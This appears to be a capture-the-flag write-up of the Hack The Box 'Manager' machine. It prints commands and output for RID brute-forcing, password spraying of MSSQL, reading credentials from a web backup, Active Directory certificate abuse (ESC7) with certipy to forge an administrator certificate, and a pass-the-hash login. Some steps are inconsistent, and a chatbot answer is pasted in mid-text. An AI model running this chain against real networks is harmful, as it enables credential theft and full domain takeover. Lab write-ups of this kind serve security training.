Skip to content

Instantly share code, notes, and snippets.

@simran-sankhala

simran-sankhala/writeup.md

Last active December 30, 2023 11:45
Show Gist options
  • Save simran-sankhala/03c5c20078466f2bd29bac840ab3a5cf to your computer and use it in GitHub Desktop.
Save simran-sankhala/03c5c20078466f2bd29bac840ab3a5cf to your computer and use it in GitHub Desktop.
Download ZIP
Manager HTB
Raw
writeup.md

Target IP Address

10.10.11.236

nmap -sC -sV 10.10.11.236 -oN manager

Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 15:32 IST
Stats: 0:00:31 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 7.69% done; ETC: 15:33 (0:00:48 remaining)
Nmap scan report for 10.10.11.236
Host is up (0.13s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
53/tcp  open  domain        Simple DNS Plus
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Manager
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-11 17:02:58Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-12-11T17:04:18+00:00; +7h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-12-11T17:04:19+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
|  10.10.11.236:1433:
|    Version:
|      name: Microsoft SQL Server 2019 RTM
|      number: 15.00.2000.00
|      Product: Microsoft SQL Server 2019
|      Service pack level: RTM
|      Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info:
|  10.10.11.236:1433:
|    Target_Name: MANAGER
|    NetBIOS_Domain_Name: MANAGER
|    NetBIOS_Computer_Name: DC01
|    DNS_Domain_Name: manager.htb
|    DNS_Computer_Name: dc01.manager.htb
|    DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2023-12-11T17:04:18+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-12-11T16:47:10
|_Not valid after:  2053-12-11T16:47:10
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-12-11T17:04:18+00:00; +7h00m00s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-12-11T17:04:19+00:00; +7h00m00s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
|  311:
|_    Message signing enabled and required
| smb2-time:
|  date: 2023-12-11T17:03:39
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.02 seconds

We can see that there are quite a lot of Ports, but what we see that is interesting are things like smb ldap web mssql etc.. We make an enum to find users first by using the Crackmapexec program for Bruteforce

Crackmapexec program

crackmapexec smb manager.htb -u anonymous -p "" --rid-brute 10000
[*]First time use detected
[*]Creating home directory structure
[*]Creating default workspace
[*]Initializing SSH protocol database
[*]Initializing LDAP protocol database
[*]Initializing WINRM protocol database
[*]Initializing FTP protocol database
[*]Initializing SMB protocol database
[*]Initializing RDP protocol database
[*]Initializing MSSQL protocol database
[*]Copying default configuration file
[*]Generating SSL certificate
SMB        manager.htb    445    DC01           
[*]Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB        manager.htb    445    DC01            [+] manager.htb\anonymous:
SMB        manager.htb    445    DC01            [+] Brute forcing RIDs
SMB        manager.htb    445    DC01            498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB        manager.htb    445    DC01            500: MANAGER\Administrator (SidTypeUser)
SMB        manager.htb    445    DC01            501: MANAGER\Guest (SidTypeUser)
SMB        manager.htb    445    DC01            502: MANAGER\krbtgt (SidTypeUser)
SMB        manager.htb    445    DC01            512: MANAGER\Domain Admins (SidTypeGroup)
SMB        manager.htb    445    DC01            513: MANAGER\Domain Users (SidTypeGroup)
SMB        manager.htb    445    DC01            514: MANAGER\Domain Guests (SidTypeGroup)
SMB        manager.htb    445    DC01            515: MANAGER\Domain Computers (SidTypeGroup)
SMB        manager.htb    445    DC01            516: MANAGER\Domain Controllers (SidTypeGroup)
SMB        manager.htb    445    DC01            517: MANAGER\Cert Publishers (SidTypeAlias)
SMB        manager.htb    445    DC01            518: MANAGER\Schema Admins (SidTypeGroup)
SMB        manager.htb    445    DC01            519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB        manager.htb    445    DC01            520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB        manager.htb    445    DC01            521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB        manager.htb    445    DC01            522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB        manager.htb    445    DC01            525: MANAGER\Protected Users (SidTypeGroup)
SMB        manager.htb    445    DC01            526: MANAGER\Key Admins (SidTypeGroup)
SMB        manager.htb    445    DC01            527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB        manager.htb    445    DC01            553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB        manager.htb    445    DC01            571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB        manager.htb    445    DC01            572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB        manager.htb    445    DC01            1000: MANAGER\DC01$ (SidTypeUser)
SMB        manager.htb    445    DC01            1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB        manager.htb    445    DC01            1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB        manager.htb    445    DC01            1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB        manager.htb    445    DC01            1113: MANAGER\Zhong (SidTypeUser)
SMB        manager.htb    445    DC01            1114: MANAGER\Cheng (SidTypeUser)
SMB        manager.htb    445    DC01            1115: MANAGER\Ryan (SidTypeUser)
SMB        manager.htb    445    DC01            1116: MANAGER\Raven (SidTypeUser)
SMB        manager.htb    445    DC01            1117: MANAGER\JinWoo (SidTypeUser)
SMB        manager.htb    445    DC01            1118: MANAGER\ChinHae (SidTypeUser)
SMB        manager.htb    445    DC01            1119: MANAGER\Operator (SidTypeUser)
┌──(root㉿kali)-[~/Desktop/manager/HTB_Manager]
└─$ nano users.txt                                                 
zhong
cheng
ryan
ravan
jinwoo
chinhae
operator

Here you can see, that i got some valid users on this machine.

Now save the names in a txt file and try to log into smb

crackmapexec mssql manager.htb -u users.txt -p users.txt
MSSQL      manager.htb    1433  DC01           
[*]Windows 10.0 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [+] manager.htb\operator:operator


[+] manager.htb\operator:operator

During enumeration, i found a valid user named “operator”.

In this step, we can see that the users of the operator can auth mssql. We connect to it to see if there is anything inside or not by using the command

┌──(root㉿kali)-[~/Desktop/manager/HTB_Manager]
└─$ impacket-mssqlclient -port 1433 manager.htb/operator:operator@10.10.11.236 -window
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*]Encryption required, switching to TLS
[*]ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*]ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*]ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*]INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*]INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*]ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands


Here i found a command executing the available files on the server. So, i executed it and got some file names.

EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;


SQL> EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
subdirectory                                                                                                                                                                                                                                                            depth          file 

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  -----------  ----------- 

about.html                                                                                                                                                                                                                                                                  1            1 

contact.html                                                                                                                                                                                                                                                                1            1 

css                                                                                                                                                                                                                                                                        1            0 

images                                                                                                                                                                                                                                                                      1            0 

index.html                                                                                                                                                                                                                                                                  1            1 

js                                                                                                                                                                                                                                                                          1            0 

service.html                                                                                                                                                                                                                                                                1            1 

web.config                                                                                                                                                                                                                                                                  1            1 

website-backup-27-07-23-old.zip                                                                                                                                                                                                                                            1            1 

SQL>

website-backup-27-07-23-old.zip

Here i get a backup file named “website-backup-27–07–23-old.zip”. Let’s download this file & see what it actually contained.

wget 10.10.11.236/website-backup-27-07-23-old.zip
--2023-11-03 04:28:30--  http://10.10.11.236/website-backup-27-07-23-old.zip
Connecting to 10.10.11.236:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’

website-backup-27-07-23-old.zip                            100%[========================================================================================================================================>]  1021K  168KB/s    in 9.3s   

2023-11-03 04:28:40 (109 KB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]
(root㉿kali)-[~/Desktop/manager/HTB_Manager/website-backup-27-07-23-old.zip]
└─$ ls
about.html  contact.html  css  images  index.html  js  service.html
                                                                                                                       
┌──(root㉿kali)-[~/Desktop/manager/HTB_Manager/website-backup-27-07-23-old.zip]
└─$ cat .old-conf.xml                         
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
        <user>raven@manager.htb</user>
        <password>R**************3</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
  </server>
  <search type="full">
      <dir-list>
        <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
  </search>
</ldap-conf>

user-raven@manager.htb
password-R***************3

Gaining User Access:

We proceeded by connecting through Evil-winrm with a simple command, and in no time, we effortlessly obtained the user flag.

(root㉿kali)-[/home/megatron/Desktop/manager/HTB_Manager]
└─# evil-winrm -i 10.10.11.236 -u raven -p 'R*************23'             

                                       
Evil-WinRM shell v3.5
                                       
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                       
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                       
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> dir
*Evil-WinRM* PS C:\Users\Raven\Documents> ls
*Evil-WinRM* PS C:\Users\Raven\Documents> cd ../
*Evil-WinRM* PS C:\Users\Raven> ls


    Directory: C:\Users\Raven


Mode                LastWriteTime        Length Name
----                -------------        ------ ----
d-r---        7/27/2023  8:24 AM                Desktop
d-r---        7/27/2023  8:23 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\Raven> cd Desktop
*Evil-WinRM* PS C:\Users\Raven\Desktop> ls


    Directory: C:\Users\Raven\Desktop


Mode                LastWriteTime        Length Name
----                -------------        ------ ----
-ar---      12/11/2023  8:47 AM            34 user.txt


*Evil-WinRM* PS C:\Users\Raven\Desktop> type user.txt
**********************************

We use Evil-winrm to connect using the command and we will get the User flag.

Privilege Escalation

most of the time certify.exe is not present in the server machine ,in my case it was not present ,while referring to writeups many had the certify exe.

https://github.com/depradip/Ghostpack_CompiledBinaries/tree/main/Ghostpack-CompiledBinaries https://github.com/depradip/Ghostpack_CompiledBinaries/tree/main

And we see that it has the SeMachineAccountPrivilege permission, which allows adding servers to the domain, although it gives us an error, so we continue.

We check if the system has vulnerable certificate templates that help us in escalation

$ certipy find -vulnerable -stdout -u raven@manager.htb -p 'R*************23' -dc-ip 10.129.143.233
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*]Finding certificate templates
[*]Found 33 certificate templates
[*]Finding certificate authorities
[*]Found 1 certificate authority
[*]Found 11 enabled certificate templates
[*]Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*]Got CA configuration for 'manager-DC01-CA'
[*]Enumeration output:
Certificate Authorities
  0
    CA Name                            : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number          : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                : Issue
    Enforce Encryption for Requests    : Enabled
    Permissions
      Owner                            : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                  : [!] Could not find any certificate templates

It does not have templates as such, but we see that it can manage the CA and that it can open issue tickets. We also see that it spits out a vulnerability, ESC7, so we go to Google and find a post on hacktricks that explains how we can exploit this bug.

So following the post, first of all, we will add the user as official

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#vulnerable-certificate-authority-access-control-esc7

Related to SubCA is Vulnerable Certificate Authority Access Control — ESC7, which here I will use as Attack 2. We can use the Command as in Hacktrick. ‘Certipy-ad’ is a tool designed for managing certificates in an Active Directory environment. It allows you to perform various certificate-related tasks, including creating, requesting, and issuing certificates. Given the presence of ‘certify.exe’ and its potential connection to certificates, I decided to explore ‘certipy-ad’ as a means to escalate my privileges and uncover hidden opportunities within the system.

or you can install certipy-ad with using the command sudo apt install certipy-ad https://github.com/ly4k/Certipy

certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R************3' && certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4**********3' && certipy req -username raven@manager.htb -password 'R***********3' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb && certipy ca -ca "manager-DC01-CA" -issue-request 14 -username 'raven@manager.htb' -password 'R***********3' && certipy req -username 'raven@manager.htb' -password 'R*************3' -ca "manager-DC01-CA" -target manager.htb -retrieve 14

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]User 'Raven' already has officer rights on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Successfully enabled 'SubCA' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*]Request ID is 17
Would you like to save the private key? (y/N) y
[*]Saved private key to 17.key
[-] Failed to request certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[-] Got error while trying to issue certificate: code: 0x80094003 - CERTSRV_E_BAD_REQUESTSTATUS - The request's current status does not allow this operation.
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Rerieving certificate with ID 14
[*]Successfully retrieved certificate
[*]Got certificate with UPN 'administrator@10.10.11.236'
[*]Certificate has no object SID
[!] Could not find matching private key. Saving certificate as PEM
[*]Saved certificate to 'administrator.crt'

To convert a .crt certificate file to a .pfx file, you can use OpenSSL¹²³. Here are the steps:

  1. Download and install OpenSSL¹. You can download it from here.
  2. Run the following command in your terminal¹³:
openssl pkcs12 -export -out certificate.pfx -inkey privateKey.key -in certificate.crt -certfile CACert.crt

In this command:

  • certificate.pfx is the name of the output PFX file.
  • privateKey.key is your private key.
  • certificate.crt is your .crt certificate.
  • CACert.crt is your certificate authority's certificate.

Please replace privateKey.key, certificate.crt, and CACert.crt with your actual file names¹³.

After running this command, you should have a .pfx file that you can use¹³. If you encounter any issues, please let me know! ?

Source: (1) ssl certificate - How to convert .crt cetificate file to .pfx - Stack .... https://stackoverflow.com/questions/9971464/how-to-convert-crt-cetificate-file-to-pfx. (2) SSL Converter - Convert SSL Certificates to different formats. https://www.sslshopper.com/ssl-converter.html. (3) How do I convert CRT to PFX, or get a PFX certificate. https://community.godaddy.com/s/question/0D53t00006Vm6vXCAR/how-do-i-convert-crt-to-pfx-or-get-a-pfx-certificate. (4) undefined. https://slproweb.com/products/Win32OpenSSL.html. (5) SSL Converter | from or to: crt, cer, pem, der, pkcs#7, p7b, pfx - HTTPCS. https://www.httpcs.com/en/ssl-converter.

After we have the cert, let's do the auth Obtaining Administrator Hash-

sudo certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Using principal: administrator@manager.htb
[*]Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

In case of any errors during this step, it’s important to resolve them by synchronizing the time with Kerberos. This can be done by executing the following command

sudo ntpdate -u manager.htb
(root㉿kali)-[~/Desktop/manager/HTB_Manager]
└─$ sudo ntpdate 10.10.11.236                                 
2023-12-12 02:19:29.635901 (+0530) +48668.980238 +/- 0.050721 10.10.11.236 s1 no-leap
CLOCK: time stepped by 48668.980238
                                                                                                                                                             
┌──(root㉿kali)-[~/Desktop/manager/HTB_Manager]
└─$ sudo certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
[sudo] password for megatron:
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Using principal: administrator@manager.htb
[*]Trying to get TGT...
[*]Got TGT
[*]Saved credential cache to 'administrator.ccache'
[*]Trying to retrieve NT hash for 'administrator'
[*]Got hash for 'administrator@manager.htb': aad3b43********************************

After successfully obtaining the Administrator hash, I used it to log in with elevated privileges. I utilized the hash as a password to connect to the system using ‘evil-winrm.’ This allowed me to access the system as the administrator, granting me root-level privileges. As a result, I was able to easily retrieve the root flag.

(root㉿kali)-[/home/megatron/Desktop/manager/HTB_Manager]
└─# evil-winrm -i 10.10.11.236 -u administrator -H ae*******************

                                       
Evil-WinRM shell v3.5
                                       
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                       
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                       
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop/
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime        Length Name
----                -------------        ------ ----
-ar---      12/11/2023  8:47 AM            34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
ba*******************************91
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment